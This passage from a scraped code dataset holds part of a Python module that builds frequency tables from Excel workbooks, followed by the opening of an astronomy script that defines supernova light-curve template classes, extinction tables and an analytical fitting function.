            c = 0
            for col_filter in filters_map:
                __filter = __entities_sheet.cell(
                    row, id_place_position[col_filter]).value
                # BUG FIX: compare against this column's expected value,
                # not the stale `val_filter` from the parse loop above.
                if __filter != filters_map[col_filter]:
                    c += 1
                    break
            if c:
                continue
        entities_map[__id] = location
    # Count entities by value in each data column:
    # data = {col: {'total': {...}, location_1: {...}, ...}, ...}
    data_sheet = __xls_file.sheet_by_name(data_sheet)
    data = {}
    cols_exclusion = cols_exclusion if type(cols_exclusion) == list else \
        [cols_exclusion] if type(cols_exclusion) == str else 0
    for col in range(1, data_sheet.ncols):
        column_name = data_sheet.cell(0, col).value
        if cols_exclusion:
            if column_name in cols_exclusion:
                continue
        # List unique values
        values = list_unique_values_column(data_sheet, col)
        # Del NoData identifier if defined
        if null or null == 0:
            if null in values:
                values.remove(null)
        # Count occurrences of each value for the filtered entities
        val_count = count_values_column_if_entity_exists(
            data_sheet, col, list(entities_map.keys()), values
        )
        for v in values:
            if v not in val_count:
                val_count[v] = 0
        data[column_name] = {'total' : map_dict(val_count)}
        # Do the same for each location
        locations = list(set(entities_map.values()))
        for place in locations:
            val_count = count_values_column_by_entity_property(
                data_sheet, col, place, entities_map,
                values
            )
            for v in values:
                if v not in val_count:
                    val_count[v] = 0
            data[column_name].update({place : map_dict(val_count)})
    # Merge every column's histograms into one 'general' table
    general = {}
    for col_sheet in data:
        for k in data[col_sheet]:
            if k not in general:
                general[k] = {}
                for _k in data[col_sheet][k]:
                    general[k][_k] = data[col_sheet][k][_k]
            else:
                for _k in data[col_sheet][k]:
                    if _k in general[k]:
                        general[k][_k] += data[col_sheet][k][_k]
                    else:
                        general[k][_k] = data[col_sheet][k][_k]
    data['general'] = general
    for __dict in data['general']:
        with_stats = map_dict(data['general'][__dict])
        data['general'][__dict] = with_stats
    # Write data in a new xls file
    out_xls = xlwt.Workbook()
    for col_sheet in data:
        new_sheet = out_xls.add_sheet(col_sheet)
        # Sort the column keys ONCE (key=str lets numeric grades and the
        # 'total'/'mean'/'stdesviation' labels be ordered together on py3)
        # and derive the header names from the same sorted list, so
        # headers and data columns can never misalign.
        cols_name = sorted(data[col_sheet]['total'].keys(), key=str)
        if out_cols_basename:
            cols_basename = ['{b}_{_k}'.format(
                b=out_cols_basename, _k=str(k)
            ) for k in cols_name]
        else:
            cols_basename = cols_name
        # Write column names
        for c in range(len(cols_name)):
            new_sheet.write(0, c+1, cols_basename[c])
        # Write lines
        lnh = 1
        lines_name = sorted(data[col_sheet].keys(), key=str)
        for line in lines_name:
            # Write line name
            new_sheet.write(lnh, 0, line)
            # Write counting data
            for cln in range(len(cols_name)):
                if cols_name[cln] in data[col_sheet][line].keys():
                    new_sheet.write(
                        lnh, cln + 1, data[col_sheet][line][cols_name[cln]]
                    )
            lnh += 1
    out_xls.save(output)
    __xls_file.release_resources()
    del __xls_file
def run_freq_by_place_by_sheet(xls, sheets_map, output_fld, null=None,
                               out_cols_basename=None, entities_filter=None,
                               cols_exclusion=None):
    """
    Execute frequencies_by_place for each group of entities and data sheets.

    One output xls file is written per entities sheet, inside output_fld.

    sheets_map should be something like this:
    sheets_map = {
        'entities_sheet_name' : {
            fid   : 'entities_field_id_name',
            place : 'entities_place_field_name',
            data  : 'data_sheet_name'
        },
        ...
    }
    """

    for entity_sheet in sheets_map:
        # BUG FIX: the original passed an undefined name "output" here;
        # derive one output file per entities sheet from output_fld.
        out_file = os.path.join(output_fld, '{}.xls'.format(entity_sheet))

        frequencies_by_place(
            xls, entity_sheet, sheets_map[entity_sheet]['fid'],
            sheets_map[entity_sheet]['place'],
            sheets_map[entity_sheet]['data'],
            out_file,
            null=null, out_cols_basename=out_cols_basename,
            entities_filter=entities_filter,
            cols_exclusion=cols_exclusion
        )
def frequencies_by_entity_attr(xls, entities_sheet, entities_id, attr_sheet,
                               interest_values, output, entities_filter=None,
                               attr_exclusion=None):
    """
    Count entities with a number of attributes with a set of specific values.

    For every entity (optionally pre-filtered with AND logic over
    entities_filter, e.g. "col=val;col2=val2"), count how many of its
    attribute cells in attr_sheet hold one of interest_values; then report,
    for each distinct occurrence count, how many entities share it.

    Output columns: values | entities_number | values_occurences

    E.g. of application: number of students with a number of negatives.
    """

    from glass.tbl.xls.fld import get_columns_position

    # Open input workbook
    __xls = xlrd.open_workbook(xls, on_demand=True)

    # Parse entity filters ("col=val;col2=val2") when given
    if entities_filter:
        filters_map = {}
        for flt in entities_filter.split(';'):
            col_filter, val_filter = flt.split('=')
            filters_map[col_filter] = val_filter
        # BUG FIX: list() is required on Py3, where dict.keys() is a view
        # that cannot be concatenated to a list
        interest_col = [entities_id] + list(filters_map.keys())
    else:
        filters_map = None
        interest_col = entities_id

    __entities_sheet = __xls.sheet_by_name(entities_sheet)
    cols_position = get_columns_position(__entities_sheet, interest_col)

    if entities_id not in cols_position:
        raise ValueError('Couldn\'t find the given column id')

    # Map every (filtered) entity id to a per-entity occurrence counter
    entities_map = {}
    for row in range(1, __entities_sheet.nrows):
        __id = __entities_sheet.cell(row, cols_position[entities_id]).value

        if filters_map:
            c = 0
            for col_filter in filters_map:
                __filter = __entities_sheet.cell(
                    row, cols_position[col_filter]).value
                if __filter != filters_map[col_filter]:
                    c += 1
                    break
            if c:
                # entity fails at least one filter: skip it
                continue

        entities_map[__id] = 0

    # Count occurrences of the interest values by entity
    data_sheet = __xls.sheet_by_name(attr_sheet)

    interest_values = interest_values if type(interest_values) == list else \
        [interest_values] if type(interest_values) == str else 0
    if not interest_values:
        raise ValueError('interest_values should be a list or string')

    for col in range(1, data_sheet.ncols):
        column_name = data_sheet.cell(0, col).value

        if attr_exclusion and type(attr_exclusion) == list:
            if column_name in attr_exclusion:
                continue

        for row in range(1, data_sheet.nrows):
            __id = data_sheet.cell(row, 0).value
            value = data_sheet.cell(row, col).value

            if value in interest_values and __id in entities_map:
                entities_map[__id] += 1

    # Count how many entities share each occurrence count.
    # BUG FIX: the original keyed this mapping by the number of entities,
    # which silently dropped occurrence counts shared by the same number
    # of entities; key it by the occurrence count instead.
    # (list() also fixes Py3, where dict.values() has no .count())
    occurence_count = list(entities_map.values())
    entities_countv = {}
    for countv in set(occurence_count):
        entities_countv[countv] = occurence_count.count(countv)

    # Write output
    out_xls = xlwt.Workbook()
    new_sheet = out_xls.add_sheet(os.path.splitext(os.path.basename(output))[0])

    # column names
    c = ['values', 'entities_number', 'values_occurences']
    for i in range(len(c)):
        new_sheet.write(0, i, c[i])

    # one row per distinct occurrence count
    l = 1
    for countv in entities_countv:
        new_sheet.write(l, 0, ';'.join([str(x) for x in interest_values]))
        new_sheet.write(l, 1, entities_countv[countv])
        new_sheet.write(l, 2, countv)
        l += 1

    out_xls.save(output)

    __xls.release_resources()
    del __xls
def frequencies_table(xls, data_sheet, output,
                      entities_sheet=None, entities_id=None,
                      entities_filter=None, values_filter=None):
    """
    Count value occurrences in each attribute column of data_sheet.

    input table:
        entity | attr_1 | attr_2 | ... | attr_n
    output table:
               | a | b | c | ...
        attr_1 | 2 | 2 | 1 | ...

    Entities may be filtered (AND logic over entities_filter,
    "col=val;col2=val2") and counted values may be restricted with
    values_filter.
    """

    from glass.tbl.xls.fld import get_columns_position
    from glass.tbl.xls.summ import count_values_column
    from glass.tbl.xls.summ import count_values_column_if_entity_exists

    # Open input workbook
    __xls = xlrd.open_workbook(xls, on_demand=True)

    # Build the list of entity ids that pass every filter (AND logic)
    if entities_sheet and entities_id and entities_filter:
        filters_map = {}
        for flt in entities_filter.split(';'):
            col_filter, val_filter = flt.split('=')
            filters_map[col_filter] = val_filter

        __entities_sheet = __xls.sheet_by_name(entities_sheet)
        # BUG FIX: list() is required on Py3 (dict.keys() is a view and
        # cannot be concatenated to a list)
        int_col = [entities_id] + list(filters_map.keys())
        cols_position = get_columns_position(__entities_sheet, int_col)

        entities_map = []
        for row in range(1, __entities_sheet.nrows):
            __id = __entities_sheet.cell(row, cols_position[entities_id]).value

            c = 0
            for col_filter in filters_map:
                __filter = __entities_sheet.cell(
                    row, cols_position[col_filter]).value
                if __filter != filters_map[col_filter]:
                    c += 1
                    break
            if c:
                continue

            entities_map.append(__id)
    else:
        entities_map = None

    attr_sheet = __xls.sheet_by_name(data_sheet)

    data = {}
    registed_values = []

    values_filter = values_filter if type(values_filter) == list else \
        [values_filter] if type(values_filter) == str else None

    for col in range(1, attr_sheet.ncols):
        col_name = attr_sheet.cell(0, col).value

        # BUG FIX: compare against None -- with "if not entities_map" an
        # empty filtered entity list fell back to counting ALL entities.
        if entities_map is None:
            values_count = count_values_column(attr_sheet, col, values_filter)
        else:
            values_count = count_values_column_if_entity_exists(
                attr_sheet, col, entities_map, values_filter
            )

        registed_values.extend(values_count.keys())
        data[col_name] = values_count

    registed_values = list(set(registed_values))

    # Write output
    out_xls = xlwt.Workbook()
    new_sheet = out_xls.add_sheet(
        os.path.splitext(os.path.basename(output))[0]
    )

    # header row: one column per registered value
    for i in range(len(registed_values)):
        new_sheet.write(0, i + 1, registed_values[i])

    # one line per attribute column, counts aligned with the header
    r = 1
    for row in data:
        new_sheet.write(r, 0, row)
        for col in range(len(registed_values)):
            if registed_values[col] in data[row]:
                new_sheet.write(r, col + 1, data[row][registed_values[col]])
        r += 1

    out_xls.save(output)
    __xls.release_resources()
    del __xls
| jasp382/glass | glass/tbl/xls/anls.py | anls.py | py | 18,189 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "decimal.Decimal",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line... |
71390250985 | #!/usr/bin/env python
import sys,os,glob, inspect
#,re,numpy,math,pyfits,glob,shutil,glob
import optparse
import scipy as sp
import numpy as np
import pylab as pl
from scipy.interpolate import interp1d
from scipy import optimize
#from mpmath import polyroots
import time
import pprint, pickle
#from snclasses import myass#setupvars
bandscols = {'U':1,'u':1,'B':3,'V':5,'R':7,'I':9,'g':13, 'r':15, 'i':17,'z':11, 'w1':-1,'w2':-2,'m2':-3}
TEMPLDIR=os.path.realpath(os.path.abspath(os.path.split(inspect.getfile\
( inspect.currentframe() ))[0]))
MINX,MAXX=-10,40
NEW_X=np.linspace(MINX,MAXX,(MAXX-MINX)*10)
def smoothListGaussian(data, strippedXs=False, degree=15):
    """Smooth a 1-D sequence with a Gaussian-weighted moving window.

    The window spans 2*degree - 1 samples; interior points are replaced
    by the Gaussian-weighted average of their window, while the edges
    (where no full window fits) keep the raw data.  strippedXs is kept
    for interface compatibility and is unused.  Returns a numpy array
    the same length as data.
    """
    window = degree * 2 - 1

    # Gaussian weights across the window, centred on the middle sample
    weight = np.array([1.0] * window)
    weightGauss = []
    for i in range(window):
        i = i - degree + 1
        frac = i / float(window)
        gauss = 1 / (np.exp((4 * frac) ** 2))
        weightGauss.append(gauss)
    weight = np.array(weightGauss) * weight

    smoothed = np.zeros(len(data), float)
    # BUG FIX: use integer division -- "window/2" is a float on Python 3
    # and crashes when used as an index
    half = window // 2
    for i in range(len(smoothed) - window):
        smoothed[i + half + 1] = \
            np.sum(np.array(data[i:i + window]) * weight) / np.sum(weight)

    # edges cannot be smoothed with a full window: copy the raw data
    smoothed[0:half] = data[0:half]
    smoothed[-half:] = data[-half:]
    return np.array(smoothed)
class setupvars:
    """Configuration container used throughout the template code: band
    lists, plotting styles, photometry codes and per-SN extinction values."""
    def __init__(self):
        # stripped-envelope SN subtypes handled by this package
        self.sntypes = ['Ib','Ic','IIb','Ic-bl','IIb-n']
        # all photometric bands (optical + NIR + Swift UVOT)
        self.bands = ['U','u','B','V','g','R','I','r','i', 'J','H','K','w1','w2','m2']
        # per-band magnitude offsets used when over-plotting light curves
        self.bandoffsets = {'U': 2, 'u': 2, 'B': 1, 'b' : 1,
                            'g' : 0, 'V': 0, 'R': -1, 'I': -2,
                            'r': -1, 'i': -2,
                            'J': -3, 'H': -4, 'K': -5, 'w1': 3, 'm2': 4, 'w2': 5}
        #cfa only bands
        self.bandsnonir =['U','u','B','V','R','I','r','i']
        self.bandsnir =['J','H','K']
        self.bandsindex ={'U':0,'u':0,'B':1,'V':2,'R':3,'I':4,'r':5,'i':6,
                          'J':7,'H':8,'K':9, 'w1':10,'w2':11,'m2':12}
        # colour combinations used for colour-curve analysis
        self.cbands = ['U-B','B-i',
                       'B-I','B-V',
                       'V-R','R-I','r-i','V-r', 'V-i','V-I',
                       'V-H', 'r-K','V-K','H-K',
                       'B-r', 'B-J', 'B-H', 'B-K', 'H-i', 'J-H', 'K-J']
        # colour -> index lookup (some colours share an index on purpose)
        self.cs = {'U-B':0,'B-V':1,'V-R':2,'R-I':3,'r-i':4,'V-r':5, 'V-i':6,
                   'V-I':7, 'V-H':8,'I-H':9,'H-J':9,'J-K':10,
                   'B-I':11,'B-i':11,'r-K':12,'V-K':13,'H-K':14,
                   'B-r':15,'B-R':19, 'B-J':16, 'B-H':17, 'B-K':18}
        # per-band photometry codes (triples of dataset-specific codes)
        self.photcodes = {'U':('01','06','Ul'), 'B':('02','07','Bl'),
                          'V':('03','08','Vl'), 'R':('04','09','Rl'),
                          'I':('05','0a','Il'), 'r':('13','0b','rl'),
                          'i':('14','0c','il'), 'u':('15','15','ul'),
                          'H':('H','H','Hl'), 'J':('J','J','Jl'),
                          'K':('K','K','Kl'),
                          'm2':('m2','m2','m2'), 'w2':('w2','w2','w2'),
                          'w1':('w1','w1','w1'), 'g':('g','g','g')}
        # matplotlib colours per band
        self.mycolors = {'U':'k','u':'k','B':'#0066cc',
                         'g': '#47b56c', 'V':'#47b56c','R':'#b20000','I':'m',
                         'r':'#b20000','i':'m',
                         'J':'#4F088A','H':'#FFB700','K':'#A4A4A4',
                         'm2':'#708090', 'w2':'#a9b2bc', 'w1':'#434d56'}
        # matplotlib colours per colour combination
        self.mycolorcolors = {'U-B':'k','B-V':'#0066cc','V-R':'#47b56c','R-I':'#b20000',
                              'V-I':'m','V-i':'m','V-r':'#47b56c','r-i':'#b20000',
                              'V-H':'#9999EE','I-H':'#9999EE','J-K':'#70B8FF','H-J':'#FFCC80',
                              'r-K':'purple', 'V-K':'SlateBlue', 'B-I':'#0B0B3B',
                              'H-K':'#FFCC80',
                              'B-i':'#0B0B3B','B-r':'#0B0B3B' ,'B-R':'#0B0B3B',
                              'w1':'k','w2':'k','m2':'k'}
        # matplotlib marker shapes per band
        self.myshapes = {'U':'^','u':'^','B':'s','V':'o','g':'<',
                         'R':'v','I':'>','r':'d','i':'h',
                         'J':'^','H':'s','K':'o',
                         'w1':'v','w2':'v','m2':'v'}
        # plotting styles per SN subtype
        self.mytypecolors = {'Ib':'k','Ic':'b','IIb':'g','Ic-bl':'r','IIb-n':'y', 'other':'k'}
        self.mysymbols = {'Ib':'o','Ic':'s','IIb':'^','Ic-bl':'v','IIb-n':'>', 'other':'x'}
        self.mylines = {'Ib':'dashed','Ic':'solid','IIb':'solid','Ic-bl':'dotted',
                        'IIb-n':'solid', 'other':'solid'}
        # instrument identifiers
        self.instcodes = {'kepler':0,'shooter':0,'mini':1}
        self.insts =['shooter', 'kepler', 'mini']
        # per-SN E(B-V) values (mag) -- presumably Milky-Way line-of-sight
        # reddening from dust maps; confirm source before reuse
        self.ebmvs={'83V':0.0178, '93J':0.0690,'94I':0.0302,'95F':0.0311,
                    '95bb':0.0948,'96cb':0.0262,'97X':0.0237,'97dq':0.0382,
                    '97ef':0.0366,'98dt':0.0219,'98fa':0.0382,'00H':0.1964,
                    '99dn':0.0451,'01ai':0.0081,'01ej':0.0460,'01gd':0.0098,
                    '02ap':0.0620,'02ji':0.0217,'03dh':0.0214,'03jd':0.0784,
                    '04aw':0.0180,'04ao':0.0893,'04dk':0.1357,'04dn':0.0415,
                    '04eu':0.0466,'04fe':0.0210,'04ff':0.0281,'04ge':0.0754,
                    '04gk':0.0247,'04gq':0.0627,'04gt':0.0398,'04gv':0.0286,
                    '05U':0.0143,'05ar':0.0394,'05az':0.0097,'05bf':0.0385,
                    '05da':0.2483,'05ek':0.1811,'05eo':0.0585,'05hg':0.0901,
                    '05kf':0.0378,'05kl':0.0219,'05kz':0.046,'05la':0.0100,
                    '05mf':0.0153,'05nb':0.0320,'06F':0.1635,'06T':0.0647,
                    '06aj':0.1267,'06ba':0.0452,'06bf':0.0216,'06cb':0.0094,
                    '06ck':0.0245,'06el':0.0973,'06ep':0.0310,'06fo':0.0250,
                    '06gi':0.0205,'06ir':0.0393,'06jc':0.0173,'06lc':0.0556,
                    '06ld':0.0144,'06lv':0.0245,'06ss':0.0178,'07C':0.0363,
                    '07D':0.2881,'07I':0.0250,'07ag':0.0250,'07aw':0.0338,
                    '07bg':0.0179,'07ce':0.0200,'07cl':0.0370,'07gr':0.0535,
                    '07hb':0.0518,'07iq':0.1182,'07ke':0.0954,'07kj':0.0691,
                    '07ru':0.2254,'07rz':0.1723,'07uy':0.0194,'08D':0.0194,
                    '08an':0.0450,'08aq':0.0383,'08ax':0.0186,'08bo':0.0513,
                    '08cw':0.0060,'08hh':0.0427,'09bb':0.0844,'09er':0.0389,
                    '09iz':0.0729,'09jf':0.0971,'09mg':0.0388,'09K':0.0491,
                    '03bg':0.0197,'10as':0.1472,'11dh':0.0308,'11ei':0.0506,
                    '07Y':0.0184, '99ex':0.0172, '07c':0.0363,'07d':0.2881,
                    '07i':0.0250,'06f':0.1635,'06t':0.0647,'13df':0.017,
                    '98bw':0.0509, '03lw':0.9040,'10bh':0.1000,'13dx':0.0368,
                    '11bm':0.0289,'11fu':0.0664,'11hs':0.0107,'13cq':0.0174,
                    '12bz':0.0303,'PTF10vgv':0.1382,'PTF10qts':0.0252,'iPTF13bvn':0.0436}
        # self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07Y':0.09,'07gr':0.038,'07ru':0.01,'08D':0.59,'08ax':0.28}
        # self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07gr':0.038,'07ru':0.01,'08D':0.5406}#,'08ax':0.3814}
        # self.ebmvhost={'02ap':0.03,'04aw':0.352,'07gr':0.03,'08D':0.5406}
        # host-galaxy E(B-V) values (mag), with literature source per line
        self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07gr':0.038,'99ex':1.0,#Hamuy02
                       '07ru':0.01,'08D':0.5406,'07Y':0.112,#Stritzinger09
                       '08ax':0.4, '03bg':0,'11ei':0.18,'11dh':0,#Taubenberger11
                       #'09jf':0.05, #Valenti11
                       # '08bo':0.24,
                       # '08ax':0.3814,
                       # '04dk':0.201,'04dn':0.5265,
                       # '04fe':0.294,
                       # #'04ff':0.274,
                       # '04gq':0.19,'05az':0.43,'05kz':0.47,
                       # '05hg':0.63,
                       # '05mf':0.383,
                       # '06el':0.21,
                       # #'06C':0.65,
                       # '05bf':0.007,
                       # '07uy':0.601, '09jf':0.0146
                       '11bm': 0.032# valenti13
                       }
        # NOTE(review): '08D' appears twice below; the later value (0.572)
        # silently wins -- confirm which one is intended
        self.ebmvcfa={'02ap':0.03,'03jd':0.10,'04aw':0.352,
                      '07ru':0.01,'08D':0.5406,
                      '06el' : 0.147 , '06ep': 0.448 ,'06fo' : 0.201,
                      '07gr': 0.0462,
                      '07kj' : 0.295 ,'07uy' : 0.378 ,'08bo' : 0.294,
                      '09er' : 0.110 ,'09iz' : 0.064 ,'09jf' : 0.045,
                      '05bf': 0.05 ,'05hg' : 0.244 ,'05kl' : 1.344,
                      '05kz' : 0.437 ,'05mf' : 0.231 ,'06aj' : 0.141,
                      '06bf' : 0.368 ,'06F' : 0.533 ,'06lv' : 0.574 ,
                      '06T' : 0.397 ,'07ag' : 0.627 ,'07C' : 0.650 ,
                      '07ce' : 0.082 ,'07cl' : 0.258 ,'08D' : 0.572 }
        #'09iz':0.1,
        #07grxt Drout reddening via Chen 2014 was 0.06, drout is 0.038
        #05hg Cano reddening 0.63 WRONG! from drout photometry?
        #09iz guessing the reddening
        ##'06aj':0.04, gives trouble although reddening should be well constrained!!
        # extinction coefficients A_lambda / E(B-V) per band
        self.AonEBmV={'U': 5.434, 'u':5.155, 'B': 4.315, 'V': 3.315, 'R': 2.673,
                      'I': 1.940, 'r': 2.751,'i': 2.086,
                      'J': 0.902,'H': 0.576, 'K': 0.367,
                      'uu':5.155,'vv':3.315,'w1':4.3,'w2':4.3,'m2':4.3}
        # per-band template containers, filled in by the template builders
        self.uberTemplate = {}
        self.meansmooth = {}
        for b in self.bands:
            self.meansmooth[b] = None
            self.uberTemplate[b] = {}
class atemplate:
    """Bare container for a single band's light-curve template.

    All slots start as None and are populated by the template builders
    elsewhere in this module: median/mean/std hold template statistics
    sampled at the epochs in x; tempfuncy holds an interpolator built
    from x and mean.
    """
    def __init__(self):
        # every slot starts unset
        self.median = self.mean = self.std = None
        self.x = self.tempfuncy = None
class templatesn:
    """One literature supernova used to build light-curve templates.

    Holds catalogue metadata (distance, inclination, extinction, type,
    epoch of maximum, peak magnitudes) plus the photometry arrays that
    loadlitlist/splinetemplates fill in later.  When new_x is not given,
    the module-wide epoch grid NEW_X is used.
    """
    def __init__(self, sn, dist=0.0, e_dist=0.0, incl=0.0, ebv=0.0, sntype='',
                 mjdmax=0.0, e_mjdmax=0.0, ebmvhost=0.0, vmr=0.0, peak=0.0,
                 e_peak=0.0, peak_ap=0.0, e_peak_ap=0.0,
                 phot=None, absphot=None, normphot=None,
                 new_x=None, new_y=None, yfunc=None):
        self.sn = sn
        self.dist = dist
        self.e_dist = e_dist
        self.incl = incl
        self.ebv = ebv
        self.sntype = sntype
        self.mjdmax = mjdmax
        self.e_mjdmax = e_mjdmax
        self.ebmvhost = ebmvhost
        self.vmr = vmr
        self.peak = peak
        self.e_peak = e_peak
        self.peak_ap = peak_ap
        self.e_peak_ap = e_peak_ap
        self.phot = phot
        self.absphot = absphot
        self.normphot = normphot
        # BUG FIX: test identity, not truthiness -- "if new_x:" raises
        # ValueError for a numpy array and wrongly discards an empty one.
        self.new_x = new_x if new_x is not None else NEW_X
        self.new_y = new_y
        self.yfunc = yfunc
class gptemplclass:
    """Holder for Gaussian-process templates: one atemplate per band,
    plus one slot per SN subtype (filled later, starts as None)."""
    def __init__(self):
        self.su = setupvars()
        # one empty template container per photometric band
        self.gptemplate = {band: atemplate() for band in self.su.bands}
        # per-SN-type templates, populated elsewhere
        self.typetemplate = dict.fromkeys(('Ib', 'Ic', 'IIb', 'Ic-bl', 'IIb-n'))
class Mytempclass:
    """Per-band light-curve template holder plus per-SN-type templates."""
    def __init__(self):
        self.su = setupvars()
        self.template = {}
        # one (empty) template container per photometric band
        for b in self.su.bands:
            self.template[b] = atemplate()
        self.typetemplate = {'Ib':None,'Ic':None,'IIb':None,'Ic-bl':None,'IIb-n':None}

    def calctemplate(self, tptype=None):
        # NOTE(review): `mysn` and `f` are undefined in this module (the
        # snclasses import at the top is commented out), and `tytype` is
        # assigned but never used (probable typo for `tptype`); this method
        # cannot run as written -- confirm intent before use.
        thissn = mysn(f, addlit=True)
        thissn.readinfofileall(verbose=False, earliest=False, loose=True)
        if tptype is None:
            tytype = self.typetemplate

    def loadtemplate(self, b, x=None, mean=None, median=None, std=None):
        # Store externally computed template arrays for band b.
        if b in self.su.bands:
            print ("ready to load temaplte")
            self.template[b].x = x
            self.template[b].mean = mean
            self.template[b].median = median
            self.template[b].std = std
        else:
            print ("wrong band ", b)

    def gettempfuncy(self, b):
        # Build an interpolator for band b's mean template; fall back from
        # cubic to linear when the cubic spline is all-NaN or wildly
        # oscillating (std of finite values > 10).
        if 1:  # not self.template[b].tempfuncy():
            from scipy.interpolate import interp1d
            self.template[b].tempfuncy = interp1d(self.template[b].x,
                                                  self.template[b].mean, kind='cubic',
                                                  bounds_error=False)
            if np.sum(np.isnan(self.template[b].tempfuncy(self.template[b].x))) == \
               len(self.template[b].x) or \
               np.std(np.array(self.template[b].tempfuncy(self.template[b].x)
                               [~np.isnan(self.template[b].tempfuncy(
                                   self.template[b].x))])) > 10:
                self.template[b].tempfuncy = interp1d(self.template[b].x,
                                                      self.template[b].mean,
                                                      kind='linear', bounds_error=False)

    def tempfuncstd(self, b):
        # NOTE(review): the interpolator built here is neither returned nor
        # stored, so this method currently has no observable effect -- it
        # probably should `return tempfuncstd`.
        from scipy.interpolate import interp1d
        tempfuncstd = interp1d(self.template[b].x, self.template[b].std,
                               kind='cubic', bounds_error=False)
        if np.sum(np.isnan(tempfuncstd(self.template[b].x))) == len(self.template[b].x) \
           or np.std(np.array(tempfuncstd(self.template[b].x)
                              [~np.isnan(tempfuncstd(self.template[b].x))])) > 10:
            tempfuncstd = interp1d(self.template[b].x, self.template[b].std,
                                   kind='linear', bounds_error=False)

    def loadtemplatefile(self, new=False, sntype=None):
        # Load pickled per-band templates from disk; with new=True a
        # per-SN-type template file is read instead (sntype then required).
        for b in self.su.bands:
            print (b, self.template[b].mean)
            # NOTE(review): truth-testing .mean is ambiguous once it holds
            # a numpy array -- confirm this guard is intended.
            if self.template[b].mean:
                print ("template already read in")
                continue
            ###preparing template functions"
            if new:
                if not sntype:
                    print ("must input sn type")
                    sys.exit()
                myfile = 'templates/new/mytemplate' + b + '_' + sntype + '.pkl'
            else:
                myfile = 'templates/mytemplate' + b + '.pkl'
            if not os.path.isfile(myfile):
                print ("file not there: ", myfile)
                continue
            pkl_file = open(myfile, 'rb')
            self.template[b] = pickle.load(pkl_file)
            pprint.pprint(self.template[b])

    def templateupdate(self, s):
        # NOTE(review): this method references several undefined names
        # (`sn`, `template`, `typetemplate`, `copy`, `stats`) and mixes
        # attribute and dict access on `s`; it cannot run as written, and
        # the duplicated nanmean call averages the new curve in twice.
        if self.typetemplate[sn.sntype] == None:
            typetemplate[sn.sntype] = copy.deepcopy(template)
        else:
            for b in ['V','R']:  # su.bands:
                new_x = NEW_X
                new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax, s['normphot'],
                                 kind='cubic', bounds_error=False)(s['new_x'])
                print (np.sum(np.isnan(np.array(new_y))), np.isnan(np.array(new_y).all()),
                       len(new_y))
                if np.sum(np.isnan(np.array(new_y))) == len(new_y):
                    print ("REDOING SPLINE WITH LINEAR")
                    new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax,
                                     sn.photometry[b]['mag']-sn.maxdata,
                                     kind='linear', bounds_error=False)(s['new_x'])
                if np.std(np.array(new_y[~np.isnan(new_y)])) > 10:
                    new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax,
                                     sn.photometry[b]['mag']-sn.maxdata,
                                     kind='linear', bounds_error=False)(s['new_x'])
                print (s['new_y'], s['normphot'])
                print (s['sn'], np.min(s['new_y'][~np.isnan(s['new_y'])]))
                typetemplate[sn.sntype][b] = stats.stats.nanmean([new_y,
                                                                  typetemplate[sn.sntype][b]],
                                                                 axis=0)
                typetemplate[sn.sntype][b] = stats.stats.nanmean([new_y,
                                                                  typetemplate[sn.sntype][b]],
                                                                 axis=0)
def mycavvaccaleib(x, p, secondg=False, earlyg=False, verbose=False):
    # Evaluate the Vacca & Leibundgut analytical light-curve model at
    # epoch(s) x for parameter vector p; see the parameter list in the
    # string below.  Returns a sequence the same length as x.
    if verbose:
        print ("\np,x", p, x)
    try:
        #needed in case i am passing an array of 1 element for x
        if verbose:
            print (len(x))
        if len(x) == 1:
            x = x[0]
    except:
        # x is a scalar (no len()): use it as-is
        pass
    latebump = False
    if p is None:
        # no parameters: return a huge penalty value for the fitter
        return (x)*99e9
    if p[8] > p[1]:
        # second gaussian peaks after the first: flag it as a late bump
        if verbose:
            print ("late bump")
        latebump = True
    '''
    fit the magnitudes with a vacca leibundgut (1997) analytical model
    p is the parameter list
    if secondg=1: secondgaussian added
    if secondg=0: secondgaussian not
    parameters are:
    p[0]=first gaussian normalization (negative if fitting mag)
    p[1]=first gaussian mean
    p[2]=first gaussian sigma
    p[3]=linear decay offset
    p[4]=linear decay slope
    p[5]=exponxential rise slope
    p[6]=exponential zero point
    p[7]=second gaussian normalization (negative if fitting mag)
    p[8]=second gaussian mean
    p[9]=second gaussian sigma
    '''
    # linear decay plus first gaussian, modulated by the exponential rise
    g = p[4]*(x) + p[3]
    g += p[0]*np.exp(-(x-p[1])**2/p[2]**2)
    g *= (np.exp(-p[5]*(x-p[6])) + 1)
    if latebump and earlyg:
        # late-bump solution when an early gaussian was requested:
        # blow the model up so the fitter rejects it
        g *= 1e5
    if secondg:
        g += p[7]*np.exp(-(x-p[8])**2/p[9]**2)
    if latebump and p[8]-p[1] < 15:
        g += p[7]*np.exp(-(x-p[8])**2/p[9]**2)
    try:
        len(g)
    except TypeError:
        # scalar result: wrap it so callers always get a sequence
        g = [g]
    #(np.zeros(len(g),float)+1)
    if p[8]-p[1] > 70:
        # NOTE(review): when g is a plain Python list, += with an ndarray
        # extends the list instead of adding elementwise -- confirm intent.
        g += (np.zeros(len(g), float) + 1)
    return g
def loadlitlist(band):
    """Load the literature SN template list and photometry for *band*.

    Reads templatelist<band>.txt from TEMPLDIR, builds one templatesn per
    entry, loads its photometry file, applies the Milky-Way reddening
    correction and computes absolute and peak-normalised magnitudes.

    Returns (list_of_templatesn, raw_numpy_table).
    Raises on an unreadable/missing template list instead of continuing.
    """
    print(TEMPLDIR)
    f = TEMPLDIR + "/" + "templatelist" + band + ".txt"
    try:
        templates = np.loadtxt(
            f, usecols=(0, 1, 2, 3, 4, 5, 7, 8, 9, 10, 13, 14, 15, 16),
            dtype={'names': ('sn', 'dist', 'e_dist', 'incl', 'ebv',
                             'type', 'mjdmax', 'e_mjdmax',
                             'peak_ap', 'e_peak_ap', 'ebmvhost',
                             'vmr', 'peak', 'e_peak'),
                   'formats': ('S6', 'f', 'f', 'f', 'f', 'S5', 'f',
